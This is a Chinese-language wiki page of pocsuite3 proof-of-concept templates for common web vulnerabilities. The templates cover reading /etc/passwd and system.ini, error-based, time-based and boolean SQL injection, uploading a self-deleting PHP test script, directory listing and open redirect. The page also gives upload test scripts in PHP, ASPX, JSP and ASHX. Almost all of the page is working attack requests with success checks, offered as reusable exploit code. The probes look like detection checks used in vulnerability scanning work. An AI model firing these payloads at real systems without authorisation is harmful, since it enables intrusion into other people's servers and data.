-
Notifications
You must be signed in to change notification settings - Fork 78
POC常见漏洞模板
ice-doom edited this page May 7, 2021
·
2 revisions
先说明下已准备好的模块,make_verify_url模块用于限制漏洞路径。
from plugin.pocsuite3.thirdparty.eyeJo import make_verify_url
url = 'http://192.168.1.1/data/'
vulurl1 = make_verify_url(url, f'/vul.php', mod=0)
vulurl2 = make_verify_url(url, f'/vul.php', mod=1)
## vulurl1:http://192.168.1.1/vul.php
## vulurl2:http://192.168.1.1/data/vul.php#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
vulID = ''''''
cveID = ''''''
cnvdID = ''''''
cnnvdID = ''''''
version = ''''''
author = ''''''
vulDate = ''''''
createDate = ''''''
updateDate = ''''''
name = '''xxxx存在xxx漏洞'''
desc = ''''''
severity = '''medium'''
vulType = ''''''
taskType = '''app-vul'''
references = ['''''']
appName = ''''''
appVersion = ''''''
appPowerLink = ''''''
samples = ['''''']
install_requires = ['''''']
def _verify(self):
result = {}
self.url, ip, port = parse_ip_port(self.target, 80)
path = ['/etc/passwd', 'c:\windows\system.ini']
for p in path:
vulurl = make_verify_url(self.url, f'/vul.php?param={p}', mod=0)
resp = requests.get(vulurl, verify=False, timeout=15)
if ((b'root:' in resp.content and b'nobody:' in resp.content and b'/bin' in resp.content) or b'for 16-bit' in resp.content) and resp.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = resp.url
result['VerifyInfo']['port'] = port
break
return self.parse_output(result)
_attack = _verify
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(TestPOC)#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
vulID = ''''''
cveID = ''''''
cnvdID = ''''''
cnnvdID = ''''''
version = ''''''
author = ''''''
vulDate = ''''''
createDate = ''''''
updateDate = ''''''
name = '''xxxx存在xxx漏洞'''
desc = ''''''
severity = '''high'''
vulType = ''''''
taskType = '''app-vul'''
references = ['''''']
appName = ''''''
appVersion = ''''''
appPowerLink = ''''''
samples = ['''''']
install_requires = ['''''']
def _verify(self):
result = {}
self.url, ip, port = parse_ip_port(self.target, 80)
vulurl = make_verify_url(self.url, "/vul.php?param=' AND updatexml(1,concat(0x7e,md5(1),0x7e),1)-- -", mod=0)
resp = requests.get(vulurl, verify=False, timeout=15)
if b'~c4ca4238a0b923820dcc509a6f75849' in resp.content and resp.status_code == 500:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = resp.url
result['VerifyInfo']['port'] = port
return self.parse_output(result)
_attack = _verify
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(TestPOC)#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
vulID = ''''''
cveID = ''''''
cnvdID = ''''''
cnnvdID = ''''''
version = ''''''
author = ''''''
vulDate = ''''''
createDate = ''''''
updateDate = ''''''
name = '''xxxx存在xxx漏洞'''
desc = ''''''
severity = '''high'''
vulType = ''''''
taskType = '''app-vul'''
references = ['''''']
appName = ''''''
appVersion = ''''''
appPowerLink = ''''''
samples = ['''''']
install_requires = ['''''']
def _verify(self):
result = {}
self.url, ip, port = parse_ip_port(self.target, 80)
vulurl = make_verify_url(self.url, "/vul.php?param=-1 OR (SELECT 7916 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,md5(123),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)", mod=0)
resp = requests.get(vulurl, verify=False, timeout=15)
if b'~~~202cb962ac59075b964b07152d234b70~~~' in resp.content and resp.status_code == 500:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = resp.url
result['VerifyInfo']['port'] = port
return self.parse_output(result)
_attack = _verify
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(TestPOC)#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
vulID = ''''''
cveID = ''''''
cnvdID = ''''''
cnnvdID = ''''''
version = ''''''
author = ''''''
vulDate = ''''''
createDate = ''''''
updateDate = ''''''
name = '''xxxx存在xxx漏洞'''
desc = ''''''
severity = '''high'''
vulType = ''''''
taskType = '''app-vul'''
references = ['''''']
appName = ''''''
appVersion = ''''''
appPowerLink = ''''''
samples = ['''''']
install_requires = ['''''']
def _verify(self):
result = {}
self.url, ip, port = parse_ip_port(self.target, 80)
data1 = "user=admin ' WAITFOR DELAY '0:0:0'-- aael&pass=123456"
data2 = "user=admin ' WAITFOR DELAY '0:0:5'-- aael&pass=123456"
vulurl = make_verify_url(self.url, "/vul.php", mod=0)
resp1 = requests.post(vulurl, data=data1, verify=False, timeout=15)
s1 = resp1.elapsed.total_seconds()
if b'xxxxxxx' in resp1.content and resp1.status_code == 200:
resp2 = requests.post(vulurl, data=data2, verify=False, timeout=15)
s2 = resp2.elapsed.total_seconds()
if s2 - s1 >= 4.5 and resp2.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = resp2.url
result['VerifyInfo']['port'] = port
return self.parse_output(result)
_attack = _verify
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(TestPOC)#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
vulID = ''''''
cveID = ''''''
cnvdID = ''''''
cnnvdID = ''''''
version = ''''''
author = ''''''
vulDate = ''''''
createDate = ''''''
updateDate = ''''''
name = '''xxxx存在xxx漏洞'''
desc = ''''''
severity = '''high'''
vulType = ''''''
taskType = '''app-vul'''
references = ['''''']
appName = ''''''
appVersion = ''''''
appPowerLink = ''''''
samples = ['''''']
install_requires = ['''''']
def _verify(self):
result = {}
self.url, ip, port = parse_ip_port(self.target, 80)
vul_url = make_verify_url(self.url, "/vul.asp?param=1' AND EXISTS(SELECT * FROM admin) AND 'zigJ'='zigJ", mod=0)
chec_vul_url = make_verify_url(self.url, "/vul.asp?param=1' AND EXISTS(SELECT * FROM admin1) AND 'zigJ'='zigJ", mod=0)
resp_chec = requests.get(chec_vul_url, verify=False, timeout=15)
if resp_chec.status_code == 500 and (b'<font face="xxxx" size=2>' in resp_chec.content or b'<fieldset>' in resp_chec.content):
resp = requests.get(vul_url, verify=False, timeout=15)
if resp.status_code == 200 and (b'<font face="xxxx" size=2>' not in resp.content or b'<fieldset>' not in resp.content):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = resp.url
result['VerifyInfo']['port'] = port
return self.parse_output(result)
_attack = _verify
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(TestPOC)用于上传测试文件,访问即删除
php:
<?php echo md5(1);unlink(__FILE__);?>aspx:
<%@ Page Language="Jscript"%>
<%
Response.Write("test");
System.IO.File.Delete(Server.MapPath("./shell.aspx"));
%>jsp:
<%
out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));
new java.io.File(application.getRealPath(request.getServletPath())).delete();
%>ashx:
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<script runat="server">
protected void Page_load(object sender,EventArgs e)
{
Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile("996","MD5").ToLower());
File.Delete(Request.PhysicalPath);
}
</script>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests, random_str
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
vulID = ''''''
cveID = ''''''
cnvdID = ''''''
cnnvdID = ''''''
version = ''''''
author = ''''''
vulDate = ''''''
createDate = ''''''
updateDate = ''''''
name = '''xxxx存在xxx漏洞'''
desc = ''''''
severity = '''high'''
vulType = ''''''
taskType = '''app-vul'''
references = ['''''']
appName = ''''''
appVersion = ''''''
appPowerLink = ''''''
samples = ['''''']
install_requires = ['''''']
def _verify(self):
result = {}
self.url, ip, port = parse_ip_port(self.target, 80)
filename = f'{random_str(5)}.php'
shell = "<?php echo md5(1);unlink(__FILE__);?>"
files = {'file': ('1.php', shell, 'Content-Type:application/octet-stream')}
payload_url = make_verify_url(self.url, '/vul.php', mod=0)
requests.post(payload_url, files=files, verify=False, timeout=15)
shell_url = '{url}/upload/{name}'.format(url=self.url, name=filename)
shell_resp = requests.get(shell_url, verify=False, timeout=15)
if shell_resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in shell_resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = shell_url
result['VerifyInfo']['port'] = port
return self.parse_output(result)
_attack = _verify
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(TestPOC)#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
vulID = ''''''
cveID = ''''''
cnvdID = ''''''
cnnvdID = ''''''
version = ''''''
author = ''''''
vulDate = ''''''
createDate = ''''''
updateDate = ''''''
name = '''xxxx存在xxx漏洞'''
desc = ''''''
severity = '''high'''
vulType = ''''''
taskType = '''app-vul'''
references = ['''''']
appName = ''''''
appVersion = ''''''
appPowerLink = ''''''
samples = ['''''']
install_requires = ['''''']
def _verify(self):
result = {}
self.url, ip, port = parse_ip_port(self.target, 80)
vul_url = make_verify_url(self.url, '/unauth/', mod=0)
resp = requests.get(vul_url, verify=False, allow_redirects=False)
if resp.status_code == 200 and (b"[To Parent Directory]" in resp.content or b'[转到父目录]' in resp.content) and b" - /unauth/" in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = resp.url
result['VerifyInfo']['port'] = port
return self.parse_output(result)
_attack = _verify
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(TestPOC)#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
vulID = ''''''
cveID = ''''''
cnvdID = ''''''
cnnvdID = ''''''
version = ''''''
author = ''''''
vulDate = ''''''
createDate = ''''''
updateDate = ''''''
name = '''xxxx存在xxx漏洞'''
desc = ''''''
severity = '''high'''
vulType = ''''''
taskType = '''app-vul'''
references = ['''''']
appName = ''''''
appVersion = ''''''
appPowerLink = ''''''
samples = ['''''']
install_requires = ['''''']
def _verify(self):
result = {}
self.url, ip, port = parse_ip_port(self.target, 80)
verify_url = make_verify_url(self.url, "/vul.php?redirect=https://www.baidu.com", mod=0)
resp = requests.get(verify_url, allow_redirects=False)
if resp.headers['Location'] == "https://www.baidu.com" and resp.status_code == 302:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = resp.url
result['VerifyInfo']['port'] = port
return self.parse_output(result)
_attack = _verify
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(TestPOC)